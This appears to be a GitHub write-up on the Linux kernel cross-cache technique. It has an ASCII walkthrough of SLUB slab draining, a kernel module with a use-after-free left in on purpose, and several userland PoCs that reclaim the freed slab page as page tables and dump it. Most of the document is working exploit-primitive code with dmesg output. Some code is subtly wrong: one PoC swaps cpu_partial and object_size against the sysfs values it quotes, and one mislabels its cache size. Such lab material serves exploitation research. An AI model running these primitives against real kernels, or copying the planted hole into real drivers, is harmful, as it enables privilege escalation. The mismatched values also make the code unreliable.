cross-cache https://github.com/Yayoi-cs/cross-cache
Theory
Order-n slab system (not so important)
page ―――― page ―――― page ―――― page
page ―――― page ―――― page ―――― page
page ―――― page ―――― page ―――― page
page ―――― page ―――― page ―――― page
page ―――― page ―――― ... ―――― page ―――― page (2^10 pages)
page ―――― page ―――― ... ―――― page ―――― page (2^10 pages)
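As a rough worked example of how a cache's slabs map onto these page orders (the real choice is made by calculate_order() in mm/slub.c, so treat this as an approximation): 256-byte objects at 16 per slab fill exactly one 4 KiB page (order 0), while 1024-byte objects at 8 per slab need an 8 KiB order-1 block. A minimal sketch:
#include <stdio.h>
/* Approximation only: the smallest order such that a (4096 << order)-byte
 * block holds objs_per_slab objects. The kernel's calculate_order() in
 * mm/slub.c is what actually decides. */
static unsigned int approx_slab_order(unsigned int object_size, unsigned int objs_per_slab) {
    unsigned int order = 0;
    while ((4096u << order) < object_size * objs_per_slab)
        order++;
    return order;
}
int main(void) {
    printf("256 B x 16/slab -> order %u\n", approx_slab_order(256, 16));  /* 0 */
    printf("1024 B x 8/slab -> order %u\n", approx_slab_order(1024, 8));  /* 1 */
    return 0;
}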
1. allocate (cpu_partial + 1) * objs_per_slab objects (cpu_partial and objs_per_slab come from sysfs; see the sketch after step 7)
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab 2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
2. allocate objs_per_slab - 1
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ────────IDLE
3. allocate victim object
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ────────UAF OBJECT
4. allocate objs_per_slab + 1. This guarantees that, wherever the victim object lands inside its slab, later freeing object[victim - objs_per_slab] through object[victim + objs_per_slab] releases every object on the victim's page, so that page can be returned to the buddy allocator.
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ────────UAF OBJECT
slab N+3 ─────────── full page
5. free victim object
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab-1] ──────── UAF OBJECT(freed)
slab N+3 ─────────── full page
6. free the remaining objects in the victim's slab, making the UAF page empty
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── freed ─────────── ... UAF OBJECT(freed)
7. free one object from each slab allocated in step 1. These frees push more than cpu_partial partially-filled slabs onto the per-CPU partial list, forcing SLUB to flush it; the now-empty victim slab is discarded and its page handed back to the page allocator.
slab 1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── (freed)
slab 2 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── (freed)
slab N ─────────── obj[0] ──────── obj[1] ──────── ... ──────── (freed)
slab N+1 ─────────── obj[0] ──────── obj[1] ──────── ... ──────── obj[objs_per_slab]
slab N+2 ─────────── freed ─────────── ... UAF OBJECT(freed)
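The three parameters steps 1-7 depend on (cpu_partial, objs_per_slab, object_size) are exposed under /sys/kernel/slab/<cache>/, as the sysfs dump further below shows. A small hypothetical helper to read them at runtime could look like this (the PoCs in this post simply hard-code the values instead):
#include <stdio.h>
/* Hypothetical helper: read one numeric attribute of a slab cache from
 * /sys/kernel/slab/<cache>/<attr>. Returns 0 if it cannot be read. */
static unsigned int slab_attr(const char *cache, const char *attr) {
    char path[256];
    unsigned int val = 0;
    snprintf(path, sizeof(path), "/sys/kernel/slab/%s/%s", cache, attr);
    FILE *f = fopen(path, "r");
    if (f) {
        if (fscanf(f, "%u", &val) != 1)
            val = 0;
        fclose(f);
    }
    return val;
}
int main(void) {
    printf("object_size   = %u\n", slab_attr("tsune_cache", "object_size"));
    printf("objs_per_slab = %u\n", slab_attr("tsune_cache", "objs_per_slab"));
    printf("cpu_partial   = %u\n", slab_attr("tsune_cache", "cpu_partial"));
    return 0;
}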
PoC (strategy 1)
#include <asm-generic/errno.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#include <linux/ioctl.h>
#include <linux/mm.h>
#define DEVICE_NAME "tsune"
#define IOCTL_CMD_POC 0x810
#define MSG_SZ 256
static struct kmem_cache *tsune_cache;
// /sys/kernel/slab/tsune_cache/
struct user_req {
unsigned int cpu_partial;
unsigned int objs_per_slab;
unsigned int object_size;
};
static long tsune_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
struct user_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { return -EFAULT; }
if (cmd != IOCTL_CMD_POC) { return -EINVAL; }
printk(KERN_INFO "tsune: PoC Invoked\n");
printk(KERN_INFO "tsune: cpu_partial=%u, objs_per_slab=%u\n", req.cpu_partial, req.objs_per_slab);
unsigned int total =
(req.cpu_partial + 1) * req.objs_per_slab
+ (req.objs_per_slab - 1)
+ 1
+ (req.objs_per_slab + 1);
unsigned long *list = kmalloc(sizeof(unsigned long) * total, GFP_KERNEL);
unsigned long *head = list;
printk(KERN_INFO "tsune: 1. allocate (cpu_partial+1)*objs_per_slab\n");
for (int i = 0; i < (req.cpu_partial + 1) * req.objs_per_slab; i++) {
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
}
printk(KERN_INFO "tsune: 2. allocate objs_per_slab-1\n");
for (int i = 0; i < req.objs_per_slab - 1; i++) {
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
}
printk(KERN_INFO "tsune: 3. allocate uaf object\n");
unsigned long *uaf_obj = list;
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
printk(KERN_INFO "tsune: 4. allocate objs_per_slab+1\n");
for (int i = 0; i < req.objs_per_slab + 1; i++) {
*list++ = (unsigned long)kmem_cache_alloc(tsune_cache, GFP_KERNEL);
}
printk(KERN_INFO "tsune: 5. free uaf object\n");
kmem_cache_free(tsune_cache, (void *)(*uaf_obj));
printk(KERN_INFO "tsune: 6. make page which has a uaf object empty\n");
for (int i = 1; i < req.objs_per_slab; i++) {
kmem_cache_free(tsune_cache, (void *)(uaf_obj[i]));
kmem_cache_free(tsune_cache, (void *)(uaf_obj[-i]));
}
printk(KERN_INFO "tsune: 7. free one object per page\n");
for (int i = 0; i < (req.cpu_partial + 1) * req.objs_per_slab; i += req.objs_per_slab) {
kmem_cache_free(tsune_cache, (void *)(head[i]));
}
printk(KERN_INFO "tsune: uaf object: %lx\n", *uaf_obj);
unsigned long uaf_page = *uaf_obj & ~0xfffUL;
unsigned int order = get_order(req.object_size * req.objs_per_slab);
printk(KERN_INFO "tsune: uaf page: %lx\n", uaf_page);
printk(KERN_INFO "tsune: uaf page order: %u\n", order);
struct page *new_page = alloc_pages(GFP_KERNEL, order);
void *new_page_ptr = page_address(new_page);
printk(KERN_INFO "tsune: new page: %lx\n", (unsigned long)new_page_ptr);
if ((unsigned long)new_page_ptr == uaf_page) {
printk(KERN_INFO "tsune: cross-cache succeed!\n");
} else {
printk(KERN_INFO "tsune: cross-cache failed!\n");
}
return 0;
}
static struct file_operations tsune_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = tsune_ioctl,
};
static struct miscdevice tsune_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = DEVICE_NAME,
.fops = &tsune_fops,
};
static int __init tsune_init(void) {
if (misc_register(&tsune_device)) { return -ENODEV; }
tsune_cache = kmem_cache_create("tsune_cache", MSG_SZ, 0, SLAB_HWCACHE_ALIGN, NULL);
if (!tsune_cache) {
return -ENOMEM;
}
return 0;
}
static void __exit tsune_exit(void) {
kmem_cache_destroy(tsune_cache);
misc_deregister(&tsune_device);
}
module_init(tsune_init);
module_exit(tsune_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("tsune");
MODULE_DESCRIPTION("load to kernel heap master");
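The userland PoCs below pull in a small personal helper header, e.h, which isn't shown in the post. The sketch below is a reconstruction of what it is assumed to provide, based purely on how the macros and helpers are used; the real header may differ.
/*
 * e.h — NOT the original header (not included in the post).
 * Minimal sketch of the helpers the userland PoCs appear to rely on;
 * every definition here is an assumption reconstructed from usage.
 */
#ifndef E_H
#define E_H
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#define PAGE_SZ 0x1000UL
/* logging helpers */
#define info(fmt, ...) printf("[*] " fmt "\n", ##__VA_ARGS__);
#define hl(x)          printf("[+] %s = 0x%lx\n", #x, (unsigned long)(x));
/* run a syscall, abort on failure, otherwise yield its return value */
#define SYSCHK(expr) ({                                       \
    typeof(expr) __res = (expr);                              \
    if ((long)__res == -1) { perror(#expr); exit(1); }        \
    __res; })
/* loop helpers */
#define rep(i, n)      for (long i = 0; i < (long)(n); i++)
#define range(i, a, b) for (long i = (long)(a); i < (long)(b); i++)
/* x86-64 4-level paging: build a user virtual address from page-table indices */
#define PTI_TO_VIRT(pgd, pud, pmd, pte, off)                                \
    ((void *)(((unsigned long)(pgd) << 39) | ((unsigned long)(pud) << 30) | \
              ((unsigned long)(pmd) << 21) | ((unsigned long)(pte) << 12) | \
              (unsigned long)(off)))
/* dump a buffer as 8-byte words */
static inline void xxd_qword(const void *buf, size_t len) {
    const unsigned long *p = buf;
    for (size_t i = 0; i + 8 <= len; i += 8)
        printf("%04zx: 0x%016lx\n", i, p[i / 8]);
}
/* allocate n pipes, returning an array of {read_fd, write_fd} pairs */
static inline int **alloc_pipe(int n) {
    int **fds = malloc(sizeof(int *) * n);
    for (int i = 0; i < n; i++) {
        fds[i] = malloc(sizeof(int) * 2);
        SYSCHK(pipe(fds[i]));
    }
    return fds;
}
static inline void pipe_write(int *p, const void *data, size_t len) {
    SYSCHK(write(p[1], data, len));
}
#endif /* E_H */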
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_POC 0x810
/*
~ # cat /sys/kernel/slab/tsune_cache/object_size
256
~ # cat /sys/kernel/slab/tsune_cache/objs_per_slab
16
~ # cat /sys/kernel/slab/tsune_cache/cpu_partial
52
*/
struct user_req {
unsigned int cpu_partial;
unsigned int objs_per_slab;
unsigned int object_size;
};
int main(void) {
info("cross-cache poc");
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
struct user_req req;
req.cpu_partial = 256;
req.objs_per_slab = 16;
req.object_size = 52;
SYSCHK(ioctl(fd, IOCTL_CMD_POC, &req));
}
# dmesg
...
[ 8.497624] tsune: PoC Invoked
[ 8.497680] tsune: cpu_partial=256, objs_per_slab=16
[ 8.497749] tsune: 1. allocate (cpu_partial+1)*objs_per_slab
[ 8.501343] tsune: 2. allocate objs_per_slab-1
[ 8.501440] tsune: 3. allocate uaf object
[ 8.501460] tsune: 4. allocate objs_per_slab+1
[ 8.501502] tsune: 5. free uaf object
[ 8.501522] tsune: 6. make page which has a uaf object empty
[ 8.501590] tsune: 7. free one object per page
[ 8.501716] tsune: uaf object: ffff89ff822f3d00
[ 8.501743] tsune: uaf page: ffff89ff822f3000
[ 8.501756] tsune: uaf page order: 0
[ 8.501783] tsune: new page: ffff89ff822f3000
[ 8.501799] tsune: cross-cache succeed!
PoC for most of the kernel slab cache sizes 🤔
module summary
what I did
module
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#include <linux/ioctl.h>
#define DEVICE_NAME "tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 512
struct user_req {
int idx;
char *userland_buf;
};
char *ptrs[1024];
static struct kmem_cache *tsune_cache;
static long tsune_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
struct user_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) {
return -EFAULT;
}
if (req.idx < 0 || req.idx >= 1024) {
return -EINVAL;
}
switch(cmd) {
case IOCTL_CMD_ALLOC:
ptrs[req.idx] = kmem_cache_alloc(tsune_cache, GFP_KERNEL);
printk("%x: %lx\n",req.idx,(unsigned long)ptrs[req.idx]);
if (!ptrs[req.idx]) {
return -ENOMEM;
}
break;
case IOCTL_CMD_FREE:
if (ptrs[req.idx]) {
kmem_cache_free(tsune_cache, ptrs[req.idx]);
//ptrs[req.idx] = NULL;
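/* intentionally not cleared: the dangling pointer keeps the freed object
 * reachable through IOCTL_CMD_READ/IOCTL_CMD_WRITE, which is the UAF
 * primitive the cross-cache PoCs below build on */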
}
break;
case IOCTL_CMD_READ:
if (ptrs[req.idx]) {
if (copy_to_user(req.userland_buf, ptrs[req.idx], MSG_SZ)) {
return -EFAULT;
}
}
break;
case IOCTL_CMD_WRITE:
if (ptrs[req.idx]) {
if (copy_from_user(ptrs[req.idx], req.userland_buf, MSG_SZ)) {
return -EFAULT;
}
}
break;
case IOCTL_CMD_PAGE:
if (ptrs[req.idx]) {
if (copy_to_user(req.userland_buf, (char *)((unsigned long)(ptrs[req.idx])&(~0xfff)), MSG_SZ)) {
return -EFAULT;
}
}
break;
default:
return -EINVAL;
}
return 0;
}
static struct file_operations tsune_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = tsune_ioctl,
};
static struct miscdevice tsune_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = DEVICE_NAME,
.fops = &tsune_fops,
};
static int __init tsune_init(void) {
if (misc_register(&tsune_device)) { return -ENODEV; }
tsune_cache = kmem_cache_create("tsune_cache", MSG_SZ, 0, SLAB_HWCACHE_ALIGN, NULL);
if (!tsune_cache) {
return -ENOMEM;
}
return 0;
}
static void __exit tsune_exit(void) {
kmem_cache_destroy(tsune_cache);
misc_deregister(&tsune_device);
}
module_init(tsune_init);
module_exit(tsune_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("tsune");
MODULE_DESCRIPTION("load to kernel heap master");
kmemcache-1024
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 1024
#define N_PTE 0x8
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 1024
#define OBJS_PER_SLAB 8
#define CPU_PARTIAL 24
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-1024");
//size_t size = 4*1024*1024;
size_t size = PAGE_SZ;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global = 0;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
#define N_PIPE 0x80
int **pipe_ptrs = alloc_pipe(N_PIPE);
rep(i,N_PIPE) {
pipe_write(pipe_ptrs[i],"A",1);
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-512
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 512
#define N_PTE 0x8
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 512
#define OBJS_PER_SLAB 8
#define CPU_PARTIAL 52
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-512");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global = 0;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-256
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 256
#define N_PTE 0x8
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 256
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 52
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-1024");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global = 0;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-128
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 128
struct user_req {
int idx;
char *userland_buf;
};
#define OBJECT_SIZE 128
#define OBJS_PER_SLAB 32
#define CPU_PARTIAL 120
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-128");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global = 0;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free uaf object")
ioctl_free(fd,uaf_idx);
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free one object per page")
rep(i,CPU_PARTIAL) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
kmemcache-32
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include "e.h"
#define DEVICE_NAME "/dev/tsune"
#define IOCTL_CMD_ALLOC 0x810
#define IOCTL_CMD_FREE 0x811
#define IOCTL_CMD_READ 0x812
#define IOCTL_CMD_WRITE 0x813
#define IOCTL_CMD_PAGE 0x814
#define MSG_SZ 32
struct user_req {
int idx;
char *userland_buf;
};
#define OBJS_PER_SLAB 128
#define CPU_PARTIAL 120
void ioctl_alloc(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_ALLOC,&req));
}
void ioctl_free(int fd, int i) {
struct user_req req = {
.idx = i,
.userland_buf = NULL
};
SYSCHK(ioctl(fd,IOCTL_CMD_FREE,&req));
}
int main(void) {
info("kmemcache-32");
size_t size = 2*1024*1024;
hl(size)
void *pte_setup = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x0, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_setup)
*(char *)pte_setup = 0x1;
int fd = SYSCHK(open(DEVICE_NAME, O_RDWR));
hl(fd);
info("1. allocate (cpu_partial+1)*objs_per_slab")
int global=0;
rep(_,(CPU_PARTIAL+1)*OBJS_PER_SLAB) {
ioctl_alloc(fd,global);
global++;
}
info("2. allocate objs_per_slab-1")
rep(_,OBJS_PER_SLAB-1) {
ioctl_alloc(fd,global);
global++;
}
info("3. allocate uaf object")
int uaf_idx = global;
ioctl_alloc(fd,global);
global++;
info("4. allocate objs_per_slab+1")
rep(_,OBJS_PER_SLAB+1) {
ioctl_alloc(fd,global);
global++;
}
info("5. free one object per page")
rep(i,CPU_PARTIAL+1) {
ioctl_free(fd,OBJS_PER_SLAB*i);
}
info("6. make page which has a uaf object empty")
range(i,1,OBJS_PER_SLAB) {
ioctl_free(fd,uaf_idx+i);
ioctl_free(fd,uaf_idx-i);
}
info("7. free uaf object")
ioctl_free(fd,uaf_idx);
char buf[MSG_SZ];
struct user_req read = {
.idx = uaf_idx,
.userland_buf = buf,
};
rep(i,0x1) {
void *pte_new = SYSCHK(mmap(PTI_TO_VIRT(0x1, 0x0, 0x80+i, 0x0, 0x0), size,
PROT_READ | PROT_WRITE, MAP_PRIVATE | 0x20 | MAP_FIXED, -1, 0));
hl(pte_new)
for (size_t i = 0; i < size; i += 4096) {
*((char*)pte_new + i) = 1;
}
}
SYSCHK(ioctl(fd,IOCTL_CMD_READ,&read));
xxd_qword(buf,sizeof(buf));
SYSCHK(ioctl(fd,IOCTL_CMD_PAGE,&read));
xxd_qword(buf,sizeof(buf));
}
/*
-serial tcp:127.0.0.1:9999,server,nowait \
-gdb tcp::12345 \
*/